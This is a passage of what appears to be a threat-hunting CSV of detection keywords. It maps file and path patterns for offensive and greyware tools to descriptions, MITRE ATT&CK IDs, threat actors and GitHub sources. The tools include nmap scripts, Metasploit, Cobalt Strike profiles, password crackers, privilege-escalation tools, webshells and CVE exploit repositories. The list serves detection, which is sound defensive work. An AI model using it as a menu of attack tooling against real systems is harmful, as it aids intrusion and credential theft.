Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-geolocation-maxmind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ip-https-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipidseq.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipmi_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ipmi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipmi-cipher-zero.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipmi-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ipscan.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipscan_*_amd64.deb*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipscan2-binary/*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipscan-any-*.jar*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*/ipv6-multicast-mld-list.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ipv6-node-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ipv6-ra-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/irc-botnet-channels.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/irc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/irc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/irc-sasl-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/irc-unrealircd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z"
+"*/iscsi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/iscsi-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/isns-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ItWasAllADream.git*","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","738","118","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z"
+"*/Ivy/Cryptor*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
+"*/Ivy/Loader/*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
+"*/jackit*","offensive_tool_keyword","jackit","Wireless Mouse and Keyboard Vulnerability This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. 
We stand on the shoulders of giants","T1210 - T1212 - T1560 - T1562","TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/insecurityofthings/jackit","1","0","N/A","N/A","8","756","138","2020-10-01T04:37:00Z","2016-07-01T23:21:56Z"
+"*/jaff.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z"
+"*/jas502n/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z"
+"*/jasperloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z"
+"*/java/jndi/RMIRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z"
+"*/jdwp-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/jdwp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/jdwp-inject.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/jdwp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/jiansiting/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","1","6","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z"
+"*/Jira-Lens.git*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z"
+"*/Jira-Lens/*","offensive_tool_keyword","RedTeam_toolkit","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z"
+"*/JoelGMSec/PyShell*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z"
+"*/john -*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*/john.git*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z"
+"*/john/run/*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*/john/run/*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*/JohnTheRipper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*/Jormungandr.git*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing 
kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z"
+"*/js/stage.js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*/js_inject.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,,
+"*/juicypotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/JuicyPotatoNG.git*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
+"*/Jump-exec/Psexec*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*/K8_CS_*_*.rar*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. 
to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z"
+"*/k8gege/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*/k8gege/scrun/*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z"
+"*/k8gege520*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
+"*/ka7ana/CVE*.ps1*","offensive_tool_keyword","poc","Simple PoC in PowerShell for CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation 
